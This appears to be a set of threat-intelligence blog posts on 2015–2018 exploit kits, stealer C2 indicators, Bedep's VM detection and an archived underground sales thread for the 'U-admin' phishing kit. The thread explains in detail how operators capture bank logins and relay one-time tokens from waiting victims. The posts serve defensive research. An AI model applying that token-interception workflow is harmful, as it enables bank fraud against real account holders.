history of the VM being sent to PonyForx (Fox stealer) C2Fox stealer (PonyForx) fingerprint in CuckooSample :cca1f8ba0be872ec86755e3defbb23c8fe4a272a6b4f7ec651302c5cddc5e183Associated C2:blognetoo[.]com/find.php/helloblognetoo[.]com/find.php/datablognetoo[.]com|104.36.83.52blognetoo[.]com|45.59.114.126Caught by ET rule :2821590 || ETPRO TROJAN Win32.Pony Variant Checkin[1] ScriptJS's Pony :master.districtpomade[.]com|188.166.54.203 - 2015-08-15 Pony C2 from ScriptJS​js.travelany[.]com[.]ve|185.80.53.18 - 2015-12-10 Pony C2 from ScriptJSRead More : http://pastebin.com/raw/uKLhTbLs few bits about ScriptJSInside Pony 1.7 / Fareit C&C - Botnet Control Panel - 2012-06-27Pony 1.9 (Win32/Fareit) - 2013-05-23 - Xylitol

Spotted by Symantec in the wild  patched with MS16-051 in may 2016, CVE-2016-0189 is now being integrated in Exploit Kit.Neutrino Exploit Kit :Here 2016-07-13 but i am being told that i am late to the party.It's already [CN] documented hereNeutrino after ScriptJS redirector dropping Locky Affid 13- 2016-07-13Flash sample in that pass : 85b707cf63abc0f8cfe027153031e853fe452ed02034b792323eecd3bc0f7fd(Out of topic payload : 300a51b8f6ad362b3e32a5d6afd2759a910f1b6608a5565ddee0cad4e249ce18 - Locky Affid 13 ) Thanks to Malc0de for invaluable help here :)Files Here: Neutrino_CVE-2016-0189_160714 (Password is malware - VT Link)Sundown :Some evidence of CVE-2016-0189 being integrated in Sundown were spotted on jul 15 by @criznashOn the 16th I recorded a pass where the CVE-2016-0189 had his own calls :Sundown exploiting CVE-2016-0189 to drop Smokebot on the 2016-07-16(Out of topic payload :  61f9a4270c9deed0be5e0ff3b988d35cdb7f9054bc619d0dc1a65f7de812a3a1 beaconing to : vicolavicolom.com | 185.93.185.224 )Files : Sundown_CVE-2016-0189_160716 (password is malware)RIG:I saw it on 2016-09-12 but might have appeared before.RIG successfully exploiting CVE-2016-0189 - 2016-09-12CVE-2016-0189 from RIG after 3 step decoding passFiles : RIG_2016-0189_2016-09-12 (password is malware)Magnitude:Here pass from 2016-09-16 but is inside since at least 2016-09-04 (Source : Trendmicro - Thanks)CVE-2016-0189 in Magnitude on 2016-09-16Sorry i can't share fiddler publicly in that case (Those specific one would give to attack side too much information about some of the technics that can be used - You know how to contact me)Out of topic Payload:  Cerbera0d9ad48459933348fc301d8479580f85298ca5e9933bd20e051b81371942b2cGrandSoft:Spotted first on 2017-09-22 here is traffic from 2018-01-30 on : Win10 Build 10240 - IE11.0.10240.16431 - KB3078071CVE-2016-0189 in GrandSoft on 2018-01-30Out of topic Payload:  GandCrab Ransomwarea15c48c74a47e81c1c8b26073be58c64f7ff58717694d60b0b5498274e5d9243Fiddler here : GrandSoft_WorkingonIE11_Win10d.zip (pass is malware) Edits :2016-07-15 a previous version was stating CVE-2015-5122 for nw23. Fixed thanks to @dnpushme2016-07-20 Adding Sundown.2016-09-17 Adding RIG2016-09-19 Adding Magnitude2018-01-30 Adding GrandSoft (but appeared there on 2017-09-22)Read More :[CN] NeutrinoEK来袭：爱拍网遭敲诈者病毒挂马 2016-07-14 - Qihoo360Patch Analysis of CVE-2016-0189 - 2016-06-22 - TheoriInternet Explorer zero-day exploit used in targeted attacks in South Korea - 2016-05-10 - SymantecNeutrino EK: fingerprinting in a Flash - 2016-06-28 - MalwarebytesPost publication Reading :Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release - 2016-07-14 - FireEye

Everyone looking at the DriveBy landscape is seeing the same : as Nuclear disappeared around April 30th,  Angler EK has totally vanished on June 7th. We were first thinking about Vacation as in January 2016 or maybe Infrastructure move. But something else is going on.---On the Week-End of the 4-5th of June I noticed that the ongoing malvertising from SadClowns was redirecting to Neutrino Exploit Kit (dropping Cerber)EngageBDR malvertising redirecting to SadClowns infra pushing traffic to Neutrino to Drop Cerber RansomwareOn the 6th I noticed several group migrating to RIG, Neutrino or even Sundown.But I got speechless when I noticed that GooNky had switched to Neutrino to spread their CryptXXX U000001 and U000006.They were sticking exclusively to Angler EK since years and their vacation were synchronized with Angler's in January.Checking all known to me infection path I could hardly find some Angler....last one were behind the EItest infection chain on the night of the 6th to 7th of June.Last Angler pass I captured on 2016-06-07EITest into Angler dropping CryptXXX 3.200 U000017On June 7th around 5:30 AM GMT my tracker recorded its last Angler hit :Last Hit in my Angler tracker.After that...RIG, Neutrino instead of Angler almost everywhere.[Side note: Magnitude is still around...But as mentioned earlier it's a One Actor operation since some time]Aside SadClowns and GooNky here are two other big (cf traffic volume) group which transition has not been covered already"WordsJS"  (named NTL/NTLR by RiskIQ) into Neutrino > CryptXXX U0000102016-06-10"ScriptJS" (Named DoublePar by RiskIQ and AfraidGate by PaloAlto) into Neutrino > CryptXXX U000011This gang  was historically dropping Necurs, then Locky Affid13 before going to CryptXXXIllustrating with a picture of words and some arrows:MISP : select documented EK pass with associated tags.1 arrow where you would have find Angler several days before.(+ SadClowns + GooNky not featured in that selection)With the recent 50 arrests tied to Lurk in mind and knowing the infection vector for Lurk was the "Indexm" variant of Angler between 2012 and beginning of 2016...we might think there is a connection and that some actors are stepping back.Another hint that this is probably not vacation "only" for Angler is that Neutrino changed its conditions on June 9th. From 880$ per week on shared server and 3.5k$ per month on dedicated, Neutrino doubled the price to 7k$ on dedicated only (no more per week work). Such move were seen in reaction to Blackhole's coder (Paunch) arrest in October 2013.So is this the End of Angler ? The pages to be written will tell us.“If a book is well written, I always find it too short.” ― Jane Austen, Sense and SensibilityPost publication notes:[2016-06-12]RIG : mentioned they were sill alive and would not change their Price.Maybe unrelated to RIG mention, Neutrino updated his thread as announced previously on underground but conditions are revisited :------Google translate:-----Tarif week on a shared server:Rent: $ 1500Limit: 100k hosts per dayOne-time daily discharge limits: $ 200Rate per month on a dedicated server:Rent: $ 4000Limits: 500k hosts per day, and more - on an individual basis.One-time daily discharge limits: $ 200----------------So now only price per week is doubled and month rate + ~20%[2016-06-13]Our exploit kit stats for the last two weeks… Angler dives, Neutrino soars. pic.twitter.com/RcYAH6tVck— News from the Lab (@FSLabs) June 13, 2016Acknowledgement:Thanks to Will Metcalf (Emerging Threats/Proofpoint) who made the replay of SadClowns' malvertising possible. Thanks to EKWatcher and Malc0de for their help on several points.Read More :XXX is Angler EK - 2015-12-21Russian hacker gang arrested over $25m theft - 2016-06-02 - BBC NewsNeutrino EK and CryptXXX - 2016-06-08 - ISCSansLurk Banker Trojan: Exclusively for Russia - 2016-06-10 - Securelist - KasperskyHow we helped to catch one of the most dangerous gangs of financial cybercriminals - 2016-08-30 - SecureList

Discovered being exploited in the wild by FireEye [1] on May 8, 2016, patched 4 days later with Flash 21.0.0.242, CVE-2016-4117 is making its way to Exploit Kits.Magnitude :CVE confirmed by FireEye - Thanks !On 2016-05-21 Magnitude is firing an exploit to Flash up to 21.0.0.213.Magnitude firing exploit to Flash 21.0.0.213 - 2016-05-21For now i did not get exploitation in the different pass i tried but in the Flash exploit we can see some quite explicit imports : import com.adobe.tvsdk.mediacore.timeline.operations.DeleteRangeTimelineOperation;Magnitude Flash Exploit showing import of the DeleteRangeTimelineOperationSpotted sample :  f5cea58952ff30e9bd2a935f5843d15952b4cf85cdd1ad5d01c8de2000c48b0aFiddler sent here.Updates to come as it appears to be a work in progress.Neutrino :2016-05-23Spotted by Eset.2016-05-23 Neutrino successfully exploit CVE-2016-4117 on Flash 21.0.0.213 and drop here CryptXXXSample in that pass : 30984accbf40f0920675f6ba0b6daf2a3b6d32c751fd6d673bddead2413170e8Fiddler sent here (Password is malware)Out of topic payload: 110891e2b7b992e238d4afbaa31e165a6e9c25de2aed442574d3993734fb5220 CryptXXXAngler EK:2016-05-23CVE identification by Henri Nurmi from F-Secure. Thanks !Angler EK successfully exploit Flash 21.0.0.213 on 2016-05-23 dropping DridexSample in that pass : 310528e97a26f3fee05baea69230f8b619481ac53c2325da90345ae7713dcee2Fiddler sent hereOut of topic payload  : 99a6f5674b738591588416390f22dedd8dac9cf5aa14d0959208b0087b718902Most likely Dridex 123 targeting Germany based on distribution path.Sundown :  [3]2016-08-27Sample in that pass : cf6be39135d8663be5241229e0f6651f9195a7434202067616ae00712a4e34e6 Fiddler sent here  (password : malware)Read More:[1] CVE-2016-4117: Flash Zero-Day Exploited in the Wild - 2016-05-13 - Genwei Jiang - FireEye[2] New Flash Vulnerability CVE-2016-4117 Shares Similarities With Older Pawn Storm Exploit - 2016-05-13 - Moony Li - TrendMicro[3] Sundown EK – Stealing Its Way to the Top - 2016-09-02 - Spiderlabs

Fallout Vault Boy maskThe goal of the post is to open-source data on a kit that has been seen live impersonating bank portal. This is mostly Raw data, few part only will be "google translated".On September 2015 the 16th,  an advert about a multipurpose kit appeared underground :------------------------------------------By: [Redacted]Subject : Инжекты | Админки | Фейки, -50% от рыночных цен -Доброе время суток всем.Рад предоставить свои услуги по разработке следующих проектов:Инжекты;Grabers 80-150$*;Pasive ATS 500-800$*;Active ATS 800-1500$*;Tooken Panels 400-800$*;Replacers 200-400$*;И многое другое...Фейки;Простые клоны 70-150$*;Продвинутые с перехватом 200-500$*;Админки на пхп;Под любые нужды ...*данные цены служат ориентиром. Реальная цена будет зависеть от каждого техзадания индивидуальноJabber( [Redacted]@exploit.im )ICQ( 6[Redacted]8 )------------------------------------------Google Translated as :------------------------------------------By: [Redacted]Subject: Inject | admin area | Fakes, -50% of the market price -Good time of day to all.I am glad to provide services for the development of the following projects:Inject;Grabers 80-150 $ *;Pasive ATS 500-800 $ *;Active ATS 800-1500 $ *;Tooken Panels 400-800 $ *;Replacers 200-400 $ *;And much more...fakes;Simple clones 70-150 $ *;Advanced interception $ 200-500 *;Admin Center on php;Under any needs ...* These prices are a guide. The actual price will depend on each individual ToRsJabber ([Redacted] @ exploit.im)ICQ (6[Redacted]8)------------------------------------------NB : The Subject became later :--Инжекты | Админки | Фейки | Android Инжекты, -50% от рыночных цен --Inject | admin area | fakes | Inject Android, 50% of the market price ---Seller later added :------------------------------------------Последее время очень мнoго вопросов по поводу как работает перехват на скам странице. Решил детально описать процес чтобы изначально не вводить клиентов в заблуждение.В самом начале надо понять что такое "СКАМ СТАНИЦА"."СКАМ СТРАНИЦА"- это копия реальной странички логина в банк ,которая находится на нашем сервере с похожем на банк доменом. Все детали вводимые на ней будут лететь к нам.Далее уже на выбор, или дание идут на емайл, или на специально сделанную админку.Тоесть суть замута такова:жертва попадает на нашу страницу ->вводит данные->потом наша страница кидает жертву обратно на оригинал ->и мы поже ипользуем данные сами чтобы войти..| Это самый примитивный пример , на самом деле все чуток сложнее и зависит от фантазии заказа .Дальше надо понять что такое "ПЕРЕХВАТ"."ПЕРЕХВАТ" - eто вид обмана, очень часто ипользуетса в инжектах. Само название говорит за себя.Инжект перехватывает дание в рельном времени и присылает нам . В это время жертва как обычно ждет с гиф на экране,а вы заходите вместо него.| Зачем это надо?Затем что если для перевода вам требуется дополнительно второй пароль/смс/тукен то можно это запросить ,пока жертва ждёт, через специально сделанные команды в админке.Основной бенефит что это можно делать повторно ,много раз.|| Перехват на скам страничке работать точно также . Жертвa вводить дание и ждет пока мы его спросим то что нам надо.|Поэтапно:Преставим себе что есть банк где на вход надо UserName и Password . На активацию перевода по IBAN надо нoмер с тукен-прибора (Pin1) и для переводa надо ввести номер в тукен-прибор и тукен-прибор даст нам номер обратно (Pin2)Теперь преставим себе что у нас есть скам странница на этот банк , которая будет отсылать нам получение даные для входа и потом покажет заставку жертве с просьбой подождать. Мы находимся на другом конце в админке и наблюдаем такую катину .Краткое пособие по админке."I'am Online"- показывает находится ли оператор в админке , если "Off-line" то все жертвы будут перенаправлены обратно на оригинал страницу.Колонка "Keys" это есть полученные детали для входа.Колонка "Pin" это для получених тукенов/пинов .Колонка "Task" для добавленья операции по запросу тукена/пинов .Колонка "Redirect" показывает релле редиректа конкретной жертвы . Если поставить "On" то жертва будет перенапрвлена на оригинал сразу.| *Если жертва мегает красним то это значит что жертва какраз ждет от вас комадуИ так , на даном этапе у нас есть логины для входа , и ждущий человвек на нашей странице .Входим, идем на активацию IBAN . Там нас спрашивает Pin1/Tooken1 .Мы идем обратно на админку и нажимаем запрос операции. У нас откроется окно с выбором операций .Нажимаем на "ask Pin1" и жертва видит вот это:Дальше все просто. Жертва вводить "pin1" и он приходит к нам на админку . А жертва в это время снова видит пред собой заставку "подождите" .Если пин подошол, идем на перевод и такимже способом просим "pin2". Важно понимать что это все можно повторять много раз и после неверного пина можно снова его запросить .Если залив ушол , ставим "Redirect" на "On" и юсер уходит на оригинал. Или в продвинутых системах можно показать ему техроботы и попросить зайти попоже.Вот и все!**Все тексты на английском по админке написаны с ошибками , я это знаю ).Делал очень быстро . Никак не дойдут руки сделать до конца ------------------------------------------On march 2016 the 9th :------------------------------------------доброе время суток всем.С великой радостью рад предложить свои услуги по разработке инжектов под мобильные устройства для многих публичных андроид ботов .Цены зависят от тех заданий .Пример роботы на один из UK линков можно посмотреть тут [REDACTED]pass:demoWith great joy, I am pleased to offer its services on developing injects for mobile devices for many public android bots.The prices depend on those jobs.An example of one of the injects on the UK link can be found here [REDACTED]pass:demo------------------------------------------Files mirrored here. (pass: demo)On march 2016 the 16th:------------------------------------------Ladie's and Gentlemen's.Don't miss out some fresh and well-designed mobile injects for UK.9 common links.Hight % success task.------------------------------------------On march 2016 the 31st:------------------------------------------Доброе время суток всем.Последним временем много клиентов задают одни и те же вопросы связаны с видео o работе перехвата на Нидерланды.Я решил более детально описать систему работы и поставить ее где-то в общедоступном месте.Прежде всего пару строчек хотел бы написать o админ панели. Oна называется Universal Admin. называется она не просто так Универсал,у нее реализована возможность поддерживать много разных проектов таких как: Tooken intercept,Text manager,Log parser,Drop manager и многое другое.[2 images here...not available at dump time]Не обращайте внимания на разные цвета и стили на Скринах ,стили меняются тоже прямо с админки.[1 image here...not available at dump time]Tо есть админ панель одна а плагинов под нее может быть много.Hа видео Вы видели эту админку с плагином Tooken intercept + Text manager.Text manager-это менеджер текстовых блоков и название кнопок, которые будут автоматически вставляется в вашы страницы,инжекты и фишинг сраницы.[1 images here...not available at dump time]Все что надо сделать для работы это создать текстовый блок с определенным ID ,потом на вашей странице создать элемент с этим же ID ивставить одну функцию в конец документа.Для примера: У вас есть инжект в котором есть определенная Легенда запроса дополнительной информации.Чтобы изменить эту Легенду вам как минимум надо разбираться в HTML и как максимум пересобирать конфигурацию бота.С помощью текстового менеджера в моей админке все что вам надо это поменять текст в определенном блоке и нажать сохранить.Tooken intercept- это собственно то о чем мы будем сейчас говорить.Не важно каким способом Вы стараетесь обмануть жертву (Injec ,phishing page) цель является добытие определенного пакета информации .Для примера скажем у вас есть Paypal Phishing page с помощью которой вы добывайте username и пароль. эти данные отсылаются куда-то наадминку в нашем случае это Universal Admin.Username и пароль это и есть тот самый пакет информации который после отправки формы сохраняются у вас ,а кокретно вот тут[1 image here...not available at dump time]Использовать эту информацию можно по-разному в зависимости от вашего проекта.Одним из методов использования этой информации является перехват(intercept) ,то есть использовать информацию в реальном времени прямо сейчас.Вы перехватили username и пароль и вместо жертвы попадаете на ак ,пока жертва ждет думая что страница грузится.В случае с PayPal использования перехвата не совсем обязательно, так как полученные пакет информации а именно username и пароль Выможете использовать и через неделю. Но в связи с тем что последнее время много контор используют One Time password(Tooken),которые действительны только 30 секунд, обойтись без Tooken interstep нереально. Tooken intercept дает вам возможность использовать тот самый пароль(tooken) на протяжении 30 секунд пока жертва ждет загрузки следующей страницы. Возьмем тот же PayPal. Скажем вы получили только что username и пароль, зашли внутрь, и на главной странице вам выскочила рамочка гдеговорится что для подтверждения вашей личности на ваш мобильный телефон был отправлен SMS с коротким кодом(Tooken) код который надо вести тam же в рамочкe.Код который был отправлен на мобильный телефон жертвы!!! жертва которая на данный момент находится на вашей странице(Phishing Inject)!!!там где только что она(жертва) ввела username и пароль, username и пароль те что пришли к вам на админку и те что вы использовали для тогочтобы зайти на тот самый аккаунт где вам выскочила рамочка!! В стандартных методах это называется запал и етот пакет информации можно выбросить. можно сделать такую же рамочку после логин этападля всех юзеров на нашей пишем фишинг или инжекте, но проблема в том что это рамочка показывается не всем и не всегда и если жертвена телефон ничего не приходило то он туда ничего никогда не ведет.Я думаю всем понятно что здесь нужна динамическая страница с дистанционным управлением. То есть вы должны принимать решения показыватьрамочку данной жертве или не показывать.Именно это и есть основа.Страница которая присоединена к нашей админке может меняться исходя из команд которые вы задаете в админке.Команд может быть много, но для этого в определенном месте в админке для каждой жертвы eсть список команд, которые можнозадать для данной страницы на которой он(жертвa) находится.[1 image here...not available at dump time]в нашем примитивном пример из PayPal в списке операции должнa присутствовать кнопка "показать рамочку".Если вы зашли на аккаунт с только что полученными данными и у вас выкидывает эту рамочку вы нажимаете кнопку "показать рамочку" для данной жертвой.И у нее на экране покажет такую же рамочку.Tooken, который будет введён в эту рамочку прилетит к вам на админ туда же где лежат username и пароль от этой жертвы.Думаю здесь все понятно.Единственное что хотел бы подчеркнуть то что жертва в любой момент может закрыть страницу закрыть компьютер вырубить сеть.В таком случае связь страницы с админкой теряется и задавать команды для данной страницы не имеет смысла.Для этого в нашей админке есть Tracker онлайн статуса который позволяет нам следить находится ли жертва онлайн или нет. [1 image here...not available at dump time]Теперь структура Tooken intercept админки.Первая страница это главная страница где показана текучка всех посетителей(жертв) ваших инжектов и фишингов.Напротив каждого посетителя есть кнопка O-Panel при нажатии на которую вы попадаете уже на индивидуальную панель операций для данного посетителя.[1 image here...not available at dump time] Именно здесь и находится список операций.Именно здесь крупным планом видно онлайн статус. Прошу заметить что онлайн статусов бывает 3(ONLINE, OFFLINE и WAITING).WAITING статус светится красным и светится только тогда когда жертва ждет операции от вас ,то есть только что вам был отправленпакет информации и страница ждет дальнейших инструкций!.[1 image here...not available at dump time]Также жертва с этим статусом мигает красным и на главной странице что поднимает их в таблице вверх. Окей давайте теперь возьмем реальный пример Phishing страницы скажем одного из нидерландских банков. тут реализованные как PCтак и мобильная версия.[1 image here...not available at dump time]Вы делаете рассылку на email и линки могут открываться на мобильном. в основном 50% так и происходит.Скажем кто-то(жертвa) переходит на Линк в вашем email и попадает на нашу страницу. Вы об этом узнаете сразу через Jabber Alert,в котором будет говориться про нового посетителя.Самое время открыть Universal панель. там вы увидите Новую колонку с информацией про посетителя а Конкретно его айпи ширина экрана и многое другое[1 image here...not available at dump time]с минуты на минуту к нам прилетят логины, их можно ждать как на главной так и на O-Panel.после того как Вы получили логины, Посетитель уходит в режим ожидания. об этом Вам будут говорить красные мигающие панели, она экранe у жертвы будет примерно такое[1 image here...not available at dump time]Что делать вам с полученным пакетом Логинов Решать только Вам. Но если у вас, находясь внутри в аккаунте, попросят ввести tooken, пароль, SMS пароль то самое время вернуться на O-Panel и нажать соответствующую команду. Команда которая приведет к тому что страница на которой находится жертва покажет ему запрос того что вам надо.[1 image here...not available at dump time]После того как жертва ввела в форму Tooken ,она снова уходит в режим ожидания, и Вы снова должны определиться что делать и какую команду ему дать. И так до бесконечности или пока жертва не Закроет страницу. Но если все-таки это надоест вам то у васесть два варианта распрощаться жертвой. это поставить блок [1 image here...not available at dump time]или перенаправить его на оригинал страницу.[1 image here...not available at dump time]При работе с одним посетителем могут стучать другие новые.Это будет отвлекать и все новые посетители будут ждать. чтобы этого избежать на главной странице есть ричашки которые контролируютрегистрацию новых посетителей и переадресацию старых поголовно. Если поставить регистрацию OFF ,то в админке только будут работать Те кто уже Там есть, все новые будут попадать на оригинал страницы контор.A если поставить редирект всех ,то все посетители(жертвы) кто есть в админке будут перенаправлены на свои оригинальные страницы поголовно.Это надо делать когда вы собрались к примеру уходить.------------------------------------------On april 2016 the 4th:------------------------------------------увжаемые друзьяновые инжекты под Андроид------------------------------------------On april 2016 the 11th:------------------------------------------Продается Пак инжектов под андроид для сбора карт.WhatsUpFacebookInstagramViberSkaypGooglePlayPrice:450$user posted imageОбезательно посмотрите видео. В инжектах реализованы Responsive & animations приемы.[Redacted]pass:1qaz------------------------------------------File mirrored here (pass : 1qaz)On april 2016 the 12th:------------------------------------------Pack of Injects for Columbia banks for sale.Credit cards colectors with admin panel on https domen.bancofalabellarbmcolombiacolpatriabancolombiabbvanetbancodeoccidentebancodebogotabancopichinchaPrice:800$[3 images here...not available at dump time]Video: [Redacted]Pass:columbia ------------------------------------------File mirrored here  (pass: columbia)On april 2016 the 14th:------------------------------------------Pack of Injects for Canada banks for sale.Credit cards colectors with admin panel on https domen.TdCibcBmoDesjRbcPrice:500$[3 images here...not available at dump time]Video: [Redacted]Pass:canada ------------------------------------------File mirrored here (pass: canada)On april 2016 the 18th:------------------------------------------Недавно вышел апдейт на U-admin(Universal Admin).Теперь все более соответствует написанному выше описанием.Админ панель теперь имеют специальную директорию под plugins, и все плагины в этой директории автоматически прописывается в админке.[1 image here...not available at dump time]Например, вы приобрели U-admin а потом "Log parser Plugin". Для этого вам просто надо поставить папку Log parser в плагин директорию в админке.Также был разработан VNC плагин который дает возможность коннектится к вашему botnet API с запросом на соединение по VNC/SOCKS для определенного бота.Этот плагин является дополнением к "Tooken Intercept" плагина про который я писал вам выше. Если вы используете "Tooken Intercept" с инжектороми в вашем боте есть в VNC, и в админке вашего Бота есть API управление VNC то при наличии VLC plugin в U-admin возможно сделать запрос на соединение по vnc или socks с ботом.Как правило это делается автоматически при самом первом соединение с инжектоm,то есть когда жертва заходит на страницу перехвата.В связи с этим была слегка переделана O-Panel где в команды была добавлена новая опция проверки статуса VNC/SOCKS соединение.[1 image here...not available at dump time]Куда ,как вы видите, при успешном соединении выводятся данные на VNC/SOCKS------------------------------------------File Tree from some components :Folder PATH listingUADMIN_|   cp.php|   head.php|   index.php|   login.php|   session.php|  +---files|   |   animate.css|   |   bootbox.min.js|   |   bootstrap-notify.min.js|   |   bootstrap-social.css|   |   hover-min.css|   |   index.php|   |   jquery-ui.css|   |   jquery-ui.min.js|   |   jquery.js|   |   my.css|   |  |   +---bootstrap|   |   +---css|   |   |       bootstrap-theme.css|   |   |       bootstrap-theme.css.map|   |   |       bootstrap-theme.min.css|   |   |       bootstrap-theme.min.css.map|   |   |       bootstrap.css|   |   |       bootstrap.css.map|   |   |       bootstrap.min.css|   |   |       bootstrap.min.css.map|   |   |      |   |   +---fonts|   |   |       glyphicons-halflings-regular.eot|   |   |       glyphicons-halflings-regular.svg|   |   |       glyphicons-halflings-regular.ttf|   |   |       glyphicons-halflings-regular.woff|   |   |       glyphicons-halflings-regular.woff2|   |   |      |   |   +---js|   |   |       bootstrap.js|   |   |       bootstrap.min.js|   |   |       npm.js|   |   |      |   |   \---switch|   |           bootstrap-switch.min.css|   |           bootstrap-switch.min.js|   |          |   +---dt|   |       dataTables.bootstrap.min.css|   |       dataTables.bootstrap.min.js|   |       jquery.dataTables.min.js|   |      |   \---images|           ui-icons_444444_256x240.png|           ui-icons_555555_256x240.png|           ui-icons_777620_256x240.png|           ui-icons_777777_256x240.png|           ui-icons_cc0000_256x240.png|           ui-icons_ffffff_256x240.png|          +---opt|       geo_switch.txt|       index.php|       theme.txt|      +---plugins|   +---intercept|   |   |   bc.php|   |   |   class.jabber.php|   |   |   dynamic__part.php|   |   |   functions.php|   |   |   gate.php|   |   |   head.php|   |   |   index.php|   |   |   main.php|   |   |   panel.php|   |   |   text.php|   |   |  |   |   +---ajax|   |   |       cp_ajax.php|   |   |       index.php|   |   |      |   |   +---files|   |   |   |   animate.css|   |   |   |   bootbox.min.js|   |   |   |   bootstrap-notify.min.js|   |   |   |   bootstrap-social.css|   |   |   |   hover-min.css|   |   |   |   index.php|   |   |   |   jquery-ui.css|   |   |   |   jquery-ui.min.js|   |   |   |   jquery.js|   |   |   |   my.css|   |   |   |  |   |   |   +---bootstrap|   |   |   |   +---css|   |   |   |   |       bootstrap-theme.css|   |   |   |   |       bootstrap-theme.css.map|   |   |   |   |       bootstrap-theme.min.css|   |   |   |   |       bootstrap-theme.min.css.map|   |   |   |   |       bootstrap.css|   |   |   |   |       bootstrap.css.map|   |   |   |   |       bootstrap.min.css|   |   |   |   |       bootstrap.min.css.map|   |   |   |   |      |   |   |   |   +---fonts|   |   |   |   |       glyphicons-halflings-regular.eot|   |   |   |   |       glyphicons-halflings-regular.svg|   |   |   |   |       glyphicons-halflings-regular.ttf|   |   |   |   |       glyphicons-halflings-regular.woff|   |   |   |   |       glyphicons-halflings-regular.woff2|   |   |   |   |      |   |   |   |   +---js|   |   |   |   |       bootstrap.js|   |   |   |   |       bootstrap.min.js|   |   |   |   |       npm.js|   |   |   |   |      |   |   |   |   \---switch|   |   |   |           bootstrap-switch.min.css|   |   |   |           bootstrap-switch.min.js|   |   |   |          |   |   |   +---dt|   |   |   |       dataTables.bootstrap.min.css|   |   |   |       dataTables.bootstrap.min.js|   |   |   |       jquery.dataTables.min.js|   |   |   |      |   |   |   \---images|   |   |           ui-icons_444444_256x240.png|   |   |           ui-icons_555555_256x240.png|   |   |           ui-icons_777620_256x240.png|   |   |           ui-icons_777777_256x240.png|   |   |           ui-icons_cc0000_256x240.png|   |   |           ui-icons_ffffff_256x240.png|   |   |          |   |   \---public|   |           .ht.db|   |           index.php|   |           Removed.txt|   |          |   +---log_parser|   |   |   functions.php|   |   |   gate.php|   |   |   head.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   +---ajax|   |   |       server_side.php|   |   |       ssp.class.php|   |   |      |   |   +---classes|   |   |       browser.php|   |   |      |   |   +---files|   |   |   |   animate.css|   |   |   |   bootbox.min.js|   |   |   |   bootstrap-notify.min.js|   |   |   |   bootstrap-social.css|   |   |   |   hover-min.css|   |   |   |   jquery-ui.min.js|   |   |   |   jquery.js|   |   |   |   my.css|   |   |   |  |   |   |   +---bootstrap|   |   |   |   +---css|   |   |   |   |       bootstrap-theme.css|   |   |   |   |       bootstrap-theme.css.map|   |   |   |   |       bootstrap-theme.min.css|   |   |   |   |       bootstrap-theme.min.css.map|   |   |   |   |       bootstrap.css|   |   |   |   |       bootstrap.css.map|   |   |   |   |       bootstrap.min.css|   |   |   |   |       bootstrap.min.css.map|   |   |   |   |      |   |   |   |   +---fonts|   |   |   |   |       glyphicons-halflings-regular.eot|   |   |   |   |       glyphicons-halflings-regular.svg|   |   |   |   |       glyphicons-halflings-regular.ttf|   |   |   |   |       glyphicons-halflings-regular.woff|   |   |   |   |       glyphicons-halflings-regular.woff2|   |   |   |   |      |   |   |   |   +---js|   |   |   |   |       bootstrap.js|   |   |   |   |       bootstrap.min.js|   |   |   |   |       npm.js|   |   |   |   |      |   |   |   |   \---switch|   |   |   |           bootstrap-switch.min.css|   |   |   |           bootstrap-switch.min.js|   |   |   |          |   |   |   \---dt|   |   |           dataTables.bootstrap.min.css|   |   |           dataTables.bootstrap.min.js|   |   |           jquery.dataTables.min.js|   |   |          |   |   \---public|   |           .htBd.db|   |           geo_switch.txt|   |           index.php|   |           theme.txt|   |          |   +---settings|   |   |   functions.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   \---public|   |           cfg.php|   |           index.php|   |          |   +---style|   |   |   functions.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   \---public|   |           index.php|   |          |   \---text|       |   functions.php|       |   main.php|       |   text.php|       |  |       \---public|               index.php|               texts.txt|              \---scrNote: If you are interested by the [Redacted] part please send a mail

Simulacra & Simulation - Jean BaudrillardFeatured in MatrixBedep could be described as a fileless loader with a resident module that can optionally perform AdFraud. It's intimate to Angler EK and appeared around August 2014. On the 2016-03-24 I noticed several move in Bedep. Angler infecting a VM and integrating it into an instance of Bedep botnet2016-03-24No more variable in the URI (as several month before), the protocol Key changed and in most of my manual checks, all threads were sending a strange payload in the first stream.2ko size for Win7 64bits :80eb8a6aba5e6e70fb6c4032242e9ae82ce305d656b4ed8b629b24e1df0aef9aPopup shown by the first payload from Bedep Stream - Win7(in the background Angler Landing)48ko size for WinXP 32bits:a0fe4139133ddb62e6db8608696ecdaf5ea6ca79b5e049371a93a83cbcc8e780Popup shown by the first payload from Bedep Stream - WinXPLooking at my traffic I thought for some time that one of the Bedep instances was split in two.Then I understood that I got different result on my "manually" driven VM (on VMWare ESXi) and my automated Cuckoo driven one ( on VirtualBox). I suspected it was related to hardening, as this is one of the main difference between those two systems.And I got confirmation. Here is an example on a GooNky ([1] [2] [3]) malvertising traffic in Australia :A VM not hardened enough against Bedep got redirected to a "decoy" instance of Bedep that i will refer as :Bedep "Robot Town" - 2016-04-12Now look what i get instead with a VM that is not spotted as is:Same Angler thread - VM not detected. 1st Stream get Vawtrak2016-04-12( Vawtrak in that stream   d24674f2f9879ee9cec3eeb49185d4ea6bf555d150b4e840407051192eda1d61 )I am not skilled enough to give you the list of checks Bedep is doing. But here is one of them spotted by Cuckoo :Bedep doing some ACPI checksI think there are multiple level of checks. Some resulting in Bedep not trying to contact the C&C, some where the positive check end up with a different seed for the Bedep DGA redirecting spotted machines in a dedicated instance. This is quite powerful :- the checks are made without dropping an executable. - if you don't know what to expect it's quite difficult to figure out that you have been trapped- there is a lot of things that operators can do with this list of known bots and initial Bedep thread ID. One of them is for instance knowing which of the infection path are researcher/bots "highway" :Illustration for Bedep "Robot Town" from an "infection path" focused point of viewThis could be just a move to perform different tasks (AdFraud only (?) ) on VMs, but my guess it that this Bedep evolution on 2016-03-24 is a fast reaction to this Proofpoint Blog from 2016-03-18 which  show how Bedep threads are additional connectable dots. Sharing publicly is often a difficult decision. The question is which side will benefits the most from it, in the long time.For researchers:In the last 3 weeks, if your VM have communicated with :95.211.205.228 (which is a Bedep ip from end of 2015 reused) || ( 85.25.41.95  && http.uri.path  "ads.php?sid=1901" ) and you are interested by the "real payload" then you might want to give PAfish a run.Marvin - Paranoid AndroidOn the other hand, any of your VM which has communicated with 104.193.252.245 (Bedep "standard" 18xx 19xx instance)  since the 24 of March is hardened enough to grab the real payload.[Edits]- Removed the AU focused mention on the 